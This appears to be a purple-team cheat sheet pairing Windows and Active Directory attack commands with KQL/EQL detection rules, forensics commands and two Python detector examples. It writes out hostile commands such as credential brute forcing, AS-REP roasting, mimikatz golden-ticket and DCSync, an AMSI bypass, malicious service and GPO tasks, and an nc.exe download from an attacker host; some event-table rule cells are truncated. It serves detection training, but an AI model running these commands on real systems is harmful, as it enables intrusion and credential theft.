Links

Purple Teaming

Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security

Purple Team Cheat Sheet: SMB Attacks and Detection

SMB Attack Commands

Attack Type
Command
Description
Enumerating Shares
smbclient -L \\\\TARGET_IP
Lists SMB shares on the target.
Null Session
rpcclient -U "" -N TARGET_IP
Connects to the target with a null session.
Brute Force
crackmapexec smb TARGET_IP -u users.txt -p passwords.txt
Brute-forces SMB credentials.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5145
A network share object was checked to see whether client can be granted desired access.
`SecurityEvent

Forensics Commands and Codes

Command
Description
log2timeline.py --storage-file timeline.plaso image.E01
Extracts a timeline from a forensic image into a plaso storage file (older plaso releases take the storage file as the first positional argument instead of --storage-file).
psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Sorts the events in the plaso storage file and writes them as log2timeline CSV; output format names are lower-case.
fls -r -m "/" image.E01 > bodyfile
Generates a body file from an image.

KQL Rule: Suspicious SMB Login

// Network (type 3) logons outside the allow-list. 4624 does not record which
// service was used, so SMB is approximated by the NTLM package (what the tooling
// above authenticates with) and by dropping machine accounts; tune the list.
let known_good_accounts = dynamic(["known_good_account"]);
SecurityEvent
| where EventID == 4624 and LogonType == 3
| where AuthenticationPackageName == "NTLM" and not(TargetUserName endswith "$")
| where TargetUserName !in (known_good_accounts)
| project TimeGenerated, Computer, TargetUserName, IpAddress, WorkstationName

EQL Rule: Excessive SMB Failures

// Elastic EQL over winlogbeat (ECS) fields: twenty failed network logons for one
// account from one source inside five minutes. "| where sequence.count" is not
// EQL syntax; "with runs" is how a repeated event is required.
sequence by winlog.event_data.TargetUserName, source.ip with maxspan=5m
  [authentication where event.code == "4625" and winlog.event_data.LogonType == "3"] with runs=20

KQL Rule: Unusual SMB Traffic

// There is no built-in NetworkTraffic table; this uses Defender for Endpoint's
// DeviceNetworkEvents and identifies SMB by destination port, because flow records
// carry the transport protocol (TCP), not "SMB". One host opening SMB to many
// others is the enumeration / lateral-movement shape.
let known_good_ips = dynamic(["known_good_ip"]);   // file servers, DCs
let threshold_value = 50;
DeviceNetworkEvents
| where RemotePort in (445, 139) and RemoteIP !in (known_good_ips)
| summarize Count = count(), Targets = dcount(RemoteIP) by DeviceName, InitiatingProcessAccountName, bin(TimeGenerated, 1h)
| where Count > threshold_value

Purple Team Cheat Sheet: FTP Attacks and Detection

FTP Attack Commands

Attack Type
Command
Description
Anonymous Login
ftp TARGET_IP then enter anonymous as user
Attempts anonymous login to FTP server.
Brute Force
hydra -l user -P passlist.txt ftp://TARGET_IP
Brute-forces FTP credentials.
File Upload
ftp TARGET_IP then use put filename
Uploads a file to the FTP server.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4625
An account failed to log on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5156
The Windows Filtering Platform has permitted a connection.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 21 -w ftp_traffic.pcap
Captures FTP traffic on port 21.
log2timeline.py --storage-file ftp.plaso ftp_traffic.pcap && psort.py -o l2tcsv -w output.csv ftp.plaso
Timelines the capture with plaso (there is no plaso binary; log2timeline.py parses, psort.py sorts). The pcap parser is not present in every plaso release; tshark -r ftp_traffic.pcap -Y ftp is the fallback for the control channel.
strings -a forensic_image.raw | grep -i 'ftp'
Searches a raw image for printable FTP-related strings; grep alone on a binary image only reports "Binary file matches".

KQL Rule: Suspicious FTP Login Attempts

// 4625 carries no application protocol, so a NetworkInformation.Protocol field does
// not exist. Attribute failures to FTP from the FTP server's own log (IIS FTP logs)
// or, for IIS FTP with Windows accounts, LogonType 8 (NetworkCleartext). Bucketing by
// time turns a raw count into a rate.
let threshold_value = 20;
SecurityEvent
| where EventID == 4625 and LogonType == 8
| summarize Count = count() by TargetUserName, IpAddress, bin(TimeGenerated, 5m)
| where Count > threshold_value

EQL Rule: FTP Brute Force Detection

// Same shape as the SMB rule; 4625 has no protocol field, so FTP is approximated by
// LogonType 8, which IIS FTP basic authentication typically produces.
sequence by winlog.event_data.TargetUserName, source.ip with maxspan=5m
  [authentication where event.code == "4625" and winlog.event_data.LogonType == "8"] with runs=20
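Added example, not part of the cheat sheet: the sliding-window logic that the SMB and FTP brute-force rules above express in EQL, run in Python over constructed 4625 records, plus the password-spraying variant (one source, one password, many accounts) that a per-account threshold never fires on. Field names (TargetUserName, IpAddress, LogonType) are the 4625 event-data names; the sample events, thresholds and window sizes are assumptions.

```python
"""Windowed failed-logon counting behind the SMB/FTP brute-force rules.

Added example (not from the cheat sheet). Records are constructed 4625 events with
the Windows event-data field names; 't' is the event timestamp as ISO 8601.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source hammering one account (brute force), one source
# trying one password across many accounts (spray), one unrelated console failure.
SAMPLE_4625 = (
    [{"t": f"2024-03-01T10:00:{s:02d}", "TargetUserName": "j.doe",
      "IpAddress": "10.10.14.5", "LogonType": "3"} for s in range(0, 50, 2)]
    + [{"t": f"2024-03-01T10:05:{i:02d}", "TargetUserName": f"user{i}",
        "IpAddress": "10.10.14.9", "LogonType": "3"} for i in range(15)]
    + [{"t": "2024-03-01T10:30:00", "TargetUserName": "a.smith",
        "IpAddress": "10.0.0.22", "LogonType": "2"}]
)


def _ts(ev):
    return datetime.fromisoformat(ev["t"])


def bruteforce_hits(events, maxspan=timedelta(minutes=5), threshold=20, logon_type="3"):
    """(account, source, count) for every pair with >= threshold network failures
    inside a sliding window of maxspan: the same condition as
    `sequence by TargetUserName, source.ip with maxspan=5m [...] with runs=20`."""
    by_key = defaultdict(list)
    for ev in events:
        if ev.get("LogonType") == logon_type:
            by_key[(ev["TargetUserName"], ev["IpAddress"])].append(_ts(ev))
    hits = []
    for (account, ip), times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > maxspan:   # shrink window from the left
                start += 1
            if end - start + 1 >= threshold:
                hits.append((account, ip, end - start + 1))
                break                                    # one hit per pair is enough
    return hits


def spray_hits(events, maxspan=timedelta(minutes=10), min_accounts=10, logon_type="3"):
    """Password spraying inverts the ratio the rule above counts: one source, one or
    two failures per account, many distinct accounts inside the window."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev.get("LogonType") == logon_type:
            by_ip[ev["IpAddress"]].append((_ts(ev), ev["TargetUserName"]))
    hits = []
    for ip, items in by_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > maxspan:
                start += 1
            accounts = {user for _, user in items[start:end + 1]}
            if len(accounts) >= min_accounts:
                hits.append((ip, len(accounts)))
                break
    return hits


if __name__ == "__main__":
    print("brute force:", bruteforce_hits(SAMPLE_4625))   # [('j.doe', '10.10.14.5', 20)]
    print("spray:", spray_hits(SAMPLE_4625))              # [('10.10.14.9', 10)]
```

Both functions key on the raw 4625 fields rather than on a protocol, because the event has none; in production the two thresholds are tuned separately, since a spray source typically stays under any per-account limit.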

KQL Rule: Unusual Outbound FTP Connections

// 5156 records the permitted connection, not the file transferred, so it can only
// show outbound FTP control connections (port 21) per process; there is no file name
// and no ApplicationProtocol field. The WFP fields sit inside EventData; Direction
// %%14593 is Outbound, %%14592 Inbound.
let threshold_value = 10;
SecurityEvent
| where EventID == 5156
| extend Direction   = extract(@'<Data Name="Direction">(.*?)</Data>', 1, EventData),
         DestPort    = toint(extract(@'<Data Name="DestPort">(\d+)</Data>', 1, EventData)),
         DestAddress = extract(@'<Data Name="DestAddress">(.*?)</Data>', 1, EventData),
         Application = extract(@'<Data Name="Application">(.*?)</Data>', 1, EventData)
| where Direction == "%%14593" and DestPort == 21
| summarize Count = count() by Computer, Application, DestAddress
| where Count > threshold_value

Attack Techniques and Commands

Attack Technique
Command
Description
LLMNR Poisoning
Responder -I eth0 -wrf
Uses Responder to poison LLMNR requests.
AS-REP Roasting
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes
Extracts AS-REP hashes for users without pre-authentication.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
GenericWrite / WriteDacl
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Grants the attacker principal full control over the target object; this needs WriteDacl (or ownership) on it. With only GenericWrite, set a serviceprincipalname on a user for targeted Kerberoasting or add a member to the group instead.
Password Spraying
crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success
Attempts to log in with a common password.
RunForrestRun.exe
.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'
Executes RunForrestRun for lateral movement.
Abusing Vulnerable GPO
New-GPOImmediateTask -TaskName "MaliciousTask" -GPODisplayName "TARGET_GPO" -Command "cmd.exe" -CommandArguments "/c evil_script.bat" -Force
Adds an immediate scheduled task to an existing GPO the current user can edit (PowerView), so every computer that applies the GPO runs the command at its next policy refresh.
Abusing MSSQL Service
Invoke-SQLOSCmd -Instance "SQL_HOST\MSSQLSERVER" -Command "net localgroup Administrators DOMAIN\user /add"
Runs an OS command through xp_cmdshell with PowerUpSQL (enables it if disabled); the login needs sysadmin, and -Instance takes host\instance or host,port.
Abusing Domain Trusts
Get-DomainTrustMapping -API
Enumerates every domain trust reachable from the current domain (recursively, via the Win32 API); the abuse that follows depends on the trust type and on whether SID filtering is enforced.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4742
A computer account was changed.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: LLMNR Poisoning Follow-on (IPC$ access from unexpected sources)

// Poisoning itself is only visible in network telemetry: answers on LLMNR (UDP 5355)
// or NBT-NS (UDP 137) from a host that is not the DNS server. What reaches the
// Security log is the use of the captured or relayed NTLM credential, which starts
// with an IPC$ connection. KQL's plain single-quoted string interprets backslashes,
// so the share name must be a verbatim @'' literal.
let threshold_value = 10;
SecurityEvent
| where EventID == 5145 and ShareName == @'\\*\IPC$'
| where not(Account endswith "$")
| summarize Count = count(), Servers = dcount(Computer) by Account, IpAddress, bin(TimeGenerated, 10m)
| where Count > threshold_value

EQL Rule: AS-REP Roasting Activity

// AS-REP roasting is a TGT request for an account that does not require Kerberos
// pre-authentication (PreAuthType 0) with an RC4 (0x17) ticket, which is what
// GetNPUsers.py asks for. TicketOptions 0x40810000 is a normal AS-REQ flag set and
// does not identify the attack; no sequence is needed.
any where event.code == "4768" and
  winlog.event_data.PreAuthType == "0" and
  winlog.event_data.TicketEncryptionType == "0x17" and
  not winlog.event_data.TargetUserName : "krbtgt"

KQL Rule: Unusual Process Execution

// CommandLine is only populated when "Include command line in process creation
// events" is enabled; the parent process is what tells a dropped tool from a
// legitimate install.
SecurityEvent
| where EventID == 4688 and NewProcessName endswith @'\RunForrestRun.exe'
| project TimeGenerated, Computer, Account, ParentProcessName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack Technique
Command
Description
Service Permission
sc.exe sdset SERVICE_NAME DACL_string
Modifies service permissions.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
Abuse ACLs
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies ACLs for domain objects.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse Service
sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"
Creates a malicious service.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Golden Ticket
mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"
Creates a Golden Ticket for domain persistence.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
4728
A member was added to a security-enabled global group.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Service Creation

// sc.exe create on the command line. CommandLine needs "Include command line in
// process creation events"; service installs also log 4697 (Security) and 7045
// (System), which catch services created through the API without sc.exe.
SecurityEvent
| where EventID == 4688 and NewProcessName endswith @'\sc.exe'
| where CommandLine has "create" and CommandLine has "binPath="
| project TimeGenerated, Computer, Account, ParentProcessName, CommandLine

EQL Rule: RC4 Service-Ticket Bursts (Kerberoast / forged tickets)

// A 4768 followed by a 4769 is every normal Kerberos logon, so that pair alerts on
// everything. What the attacks in this section leave behind is RC4 (0x17) service
// tickets in a domain whose accounts use AES: Kerberoasting asks for them, and
// forged tickets are usually built with the RC4 key. Ten in five minutes by one user.
sequence by winlog.event_data.TargetUserName with maxspan=5m
  [any where event.code == "4769" and winlog.event_data.TicketEncryptionType == "0x17"
   and not winlog.event_data.ServiceName : "krbtgt" and not winlog.event_data.ServiceName : "*$"] with runs=10

KQL Rule: Privileged Group Membership and AD ACL Changes

// 4728/4732/4756 are group-membership additions, not ACL changes; match them on the
// privileged groups rather than on a member name or on the S-1-5-21 prefix that every
// domain SID shares. The ACL edit itself (Add-DomainObjectAcl) is a 5136 on the
// nTSecurityDescriptor attribute and requires "Audit Directory Service Changes".
let privileged_groups = dynamic(["Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins", "Account Operators"]);
SecurityEvent
| where EventID in (4728, 4732, 4756) and TargetUserName in (privileged_groups)
| project TimeGenerated, Computer, SubjectUserName, MemberName, MemberSid, TargetUserName, TargetDomainName
| union (SecurityEvent
    | where EventID == 5136 and AttributeLDAPDisplayName == "nTSecurityDescriptor"
    | project TimeGenerated, Computer, SubjectUserName, ObjectDN, AttributeValue)

Attack Techniques and Commands

Attack Technique
Command
Description
Resource-Based Constrained Delegation (raw attribute)
$sd = New-Object Security.AccessControl.RawSecurityDescriptor('O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;ATTACKER_SID)'); $b = New-Object byte[] $sd.BinaryLength; $sd.GetBinaryForm($b, 0); Set-ADObject -Identity target -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $b}
Writes a binary security descriptor naming the attacker-controlled account into the target's RBCD attribute (the attribute does not accept an SDDL string); needs write access to that attribute on the target object.
Resource-Based Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker$
Same change through the ActiveDirectory module; the attacker-controlled computer account can then impersonate users to the target with S4U2Self/S4U2Proxy. Classic constrained delegation lives in msDS-AllowedToDelegateTo on the delegating account and needs SeEnableDelegationPrivilege to set.
Unconstrained Delegation Print Bug
Rubeus.exe monitor /interval:30 /nowrap
Monitors for TGTs if unconstrained delegation is enabled.
Cross Trust
Get-DomainTrust -Domain target_domain
Enumerates trust relationships between domains.
Abuse MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Privilege Escalation

// 4672 fires for every admin and machine-account logon, so drop those first; what
// remains is an identity outside the admin set receiving SeDebug/SeTcb-class
// privileges. The event carries no process name.
let known_good_accounts = dynamic(["known_good_account"]);
SecurityEvent
| where EventID == 4672
| where not(Account endswith "$") and Account !in (known_good_accounts)
| project TimeGenerated, Computer, Account, PrivilegeList

EQL Rule: Suspicious Delegation Use

// Constrained-delegation abuse is an S4U2Proxy request: a 4769 whose TransmittedServices
// field is not "-", because the impersonated user's ticket is presented alongside the
// request. A plain 4768/4769 pair is every normal logon and must not be alerted on.
any where event.code == "4769" and
  winlog.event_data.TransmittedServices != "-" and
  winlog.event_data.TransmittedServices != ""

KQL Rule: Abnormal SQL Server Command Execution

// xp_cmdshell (what Invoke-SQLOSCmd enables and calls) spawns the OS command as a
// child of sqlservr.exe, so key on the parent: sqlservr.exe is never the new process
// and the command text is not known in advance.
SecurityEvent
| where EventID == 4688 and ParentProcessName endswith @'\sqlservr.exe'
| where NewProcessName endswith @'\cmd.exe' or NewProcessName endswith @'\powershell.exe'
| project TimeGenerated, Computer, Account, ParentProcessName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack Technique
Command
Description
Bypass AMSI
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Sets the private amsiInitFailed flag so the PowerShell session stops calling AMSI; the literal strings are themselves AMSI-signatured today, which is why script-block logging (4104) is the detection point.
Resource-Based Constrained Delegation (raw attribute)
$sd = New-Object Security.AccessControl.RawSecurityDescriptor('O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;ATTACKER_SID)'); $b = New-Object byte[] $sd.BinaryLength; $sd.GetBinaryForm($b, 0); Set-ADObject -Identity target -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $b}
Writes a binary security descriptor naming the attacker-controlled account into the target's RBCD attribute (the attribute does not accept an SDDL string); needs write access to that attribute on the target object.
Resource-Based Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker$
Same change through the ActiveDirectory module; the attacker-controlled computer account can then impersonate users to the target with S4U2Self/S4U2Proxy.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
DCSync Attack
mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"
Pulls the krbtgt secret by asking a DC to replicate it; needs the DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) rights, and shows up as a 4662 on the DC carrying those GUIDs rather than in any Kerberos ticket event.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4104
PowerShell script block logging.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: AMSI Bypass Detection

// 4104 lives in Microsoft-Windows-PowerShell/Operational, which Sentinel stores in
// the Event table, not SecurityEvent; the script text is inside EventData. Match
// the other AmsiUtils member names too, since the flag name alone is easy to split.
Event
| where EventLog == "Microsoft-Windows-PowerShell/Operational" and EventID == 4104
| extend ScriptBlockText = extract(@'<Data Name="ScriptBlockText">([\s\S]*?)</Data>', 1, EventData)
| where ScriptBlockText has_any ("amsiInitFailed", "AmsiUtils", "AmsiScanBuffer", "amsiContext")
| project TimeGenerated, Computer, UserName, ScriptBlockText
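Added example, not part of the cheat sheet: the script-block match behind the AMSI rule above, with a small normalisation step so that the cheapest ways of splitting the indicator ('amsi'+'Init'+'Failed', a backtick inside the name, odd casing) still match. The input is constructed 4104 ScriptBlockText strings; the indicator list is an assumption, and real evasions that build the string from char codes or reflection are out of scope for a substring check.

```python
"""Script-block matching for AMSI-bypass indicators with light de-obfuscation.

Added example (not from the cheat sheet). SAMPLE_4104 is constructed; AMSI_INDICATORS
is an assumed list of AmsiUtils member names worth flagging.
"""
import re

AMSI_INDICATORS = ("amsiinitfailed", "amsiutils", "amsiscanbuffer", "amsicontext")

# 'a'+'b' or "a"+"b": two literals joined by '+' (no mixed quotes per pair).
_JOIN = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize_script_block(text):
    """Undo backtick escapes and literal concatenation, then lower-case.

    The join is repeated until stable so chains like 'a'+'b'+'c' collapse; the
    format operator (-f) and [char] arithmetic are deliberately not handled.
    """
    t = text.replace("`", "")
    while True:
        new = _JOIN.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), t)
        if new == t:
            break
        t = new
    return t.lower()


def amsi_indicators(script_block_text):
    """Indicators present in the normalised block, in AMSI_INDICATORS order."""
    norm = normalize_script_block(script_block_text)
    return [ind for ind in AMSI_INDICATORS if ind in norm]


# Constructed 4104 ScriptBlockText values: the plain one-liner, a split version,
# a benign command, and a backtick-split type name.
SAMPLE_4104 = [
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    "$f=('amsi'+'Init'+'Failed'); [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils')"
    ".GetField($f,'NonPublic,Static').SetValue($null,$true)",
    "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB",
    '[Ref].Assembly.GetType("System.Management.Automation.Amsi`Utils")',
]

if __name__ == "__main__":
    for block in SAMPLE_4104:
        print(amsi_indicators(block), "<-", block[:60])
```

The normalisation runs on the collector or in a notebook over exported 4104 text; in the KQL rule itself the equivalent is matching each indicator separately, which is why the rule lists AmsiUtils and AmsiScanBuffer as well as the flag name.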

EQL Rule: Kerberos Encryption Downgrade (RC4 tickets)

// Forged tickets (golden / pass-the-ticket from mimikatz) and Kerberoasting both
// show up as RC4 (0x17) tickets in a domain whose accounts use AES; a 4768-then-4769
// pair on its own is every normal logon and must not be alerted on.
any where event.code in ("4768", "4769") and
  winlog.event_data.TicketEncryptionType == "0x17" and
  not winlog.event_data.TargetUserName : "*$"

KQL Rule: Suspicious SQL Command Execution

// The OS command launched through xp_cmdshell is a child of sqlservr.exe; the
// service itself is never the new process and the command text is unknown.
SecurityEvent
| where EventID == 4688 and ParentProcessName endswith @'\sqlservr.exe'
| where NewProcessName endswith @'\cmd.exe' or NewProcessName endswith @'\powershell.exe'
| project TimeGenerated, Computer, Account, ParentProcessName, NewProcessName, CommandLine

Purple Team Cheat Sheet: Comprehensive Attack Scenario

Attack Techniques and Commands

Attack Technique
Command
Description
Map Scanning
nmap -sC -sV -oA map/result 10.10.10.210
Scans the target for open ports and services.
Gobuster Directory Scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
Enumerates directories on the web server.
Gathering Usernames
Gather usernames manually and create a user.txt file
Collects usernames for further attacks.
Password Spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
Attempts to log in with common passwords.
Sending Phishing Emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
Executes a phishing campaign.
Cracking NTLMv2 Hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
Cracks captured NetNTLMv2 hashes; --force only silences driver warnings and is not needed on a working install.
PowerShell Remote Session
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
Establishes a remote PowerShell session with the recovered credentials (prompts for the password).
Creating a Junction
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Creates a directory junction from a writable path to the Administrator profile, so a command restricted to that path can read into it.
Using Check-File Command
Check-File C:\programdata\root\Desktop\root.txt
Checks for the presence of a specific file.
Transferring Files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'
Transfers files using nc.exe.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py --storage-file timeline.plaso image.E01 && psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso
Extracts a timeline from a forensic image (log2timeline.py) and sorts it to CSV (psort.py); -z, -o and -w are psort.py options, not log2timeline.py options.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

// There is no built-in NetworkTraffic table; DeviceNetworkEvents (Defender for
// Endpoint) is used here. The scenario's tool download (iwr to the attacker host)
// is a scripting host talking HTTP to an address outside the allow-list, which is
// worth seeing even once, so there is no count threshold.
let known_good_ips = dynamic(["known_good_ip"]);
DeviceNetworkEvents
| where RemotePort in (80, 443) and RemoteIP !in (known_good_ips)
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe")
| summarize Count = count() by DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort

EQL Rule: Suspicious Process Creation

// sequence.count is not EQL syntax, and the download step above (iwr ... nc.exe)
// means nc.exe is started by PowerShell, so a parent-child match on one 4688 is
// both valid and tighter than counting a pair. process.parent.name needs the 4688
// "Creator Process Name" field (Windows 10 / Server 2016 and later).
process where event.code == "4688" and
  process.name : "nc.exe" and process.parent.name : ("powershell.exe", "pwsh.exe")

KQL Rule: Abnormal File Access

// Administrative-share access from a client address is the PsExec / file-drop
// pattern. ShareName is logged as \\*\C$, which needs a verbatim string in KQL;
// AccessMask separates a drop (0x2 WriteData bit set) from a read.
SecurityEvent
| where EventID == 5145 and ShareName in (@'\\*\C$', @'\\*\ADMIN$')
| where not(Account endswith "$")
| project TimeGenerated, Computer, Account, IpAddress, ShareName, RelativeTargetName, AccessMask

Purple Team Cheat Sheet: Web-Based Attack Scenario

Attack Techniques and Commands

Attack Technique
Command
Description
Nmap Scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
Scans the target for open ports and services.
Web Enumeration with Wappalyzer
Use Wappalyzer to identify backend technologies
Identifies technologies used on the web server.
Analyzing .git Directory
Check the Gemfile in the git directory for Ruby and Gem versions
Analyzes the .git directory for sensitive information.
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
Exploits vulnerabilities in Ruby on Rails.
Capturing Request in Burp
Capture the request and modify it with the exploit
Captures and modifies HTTP requests for exploitation.
Getting a Reverse Shell
Use netcat listener and send the exploit to get a reverse shell
Gains shell access on the target system.
Cracking Password Hashes
Use John the Ripper to crack password hashes found in /var/backups
Cracks password hashes to gain credentials.
Bypassing Two-Factor Authentication
Use the contents of .google_authenticator to bypass two-factor authentication
Bypasses 2FA using the .google_authenticator file.
Synchronizing Time for Exploit
Adjust the system time to match the timezone for the exploit to work
Synchronizes system time for time-based exploits.
Gaining Root Access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
Uses GTFOBins for privilege escalation.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
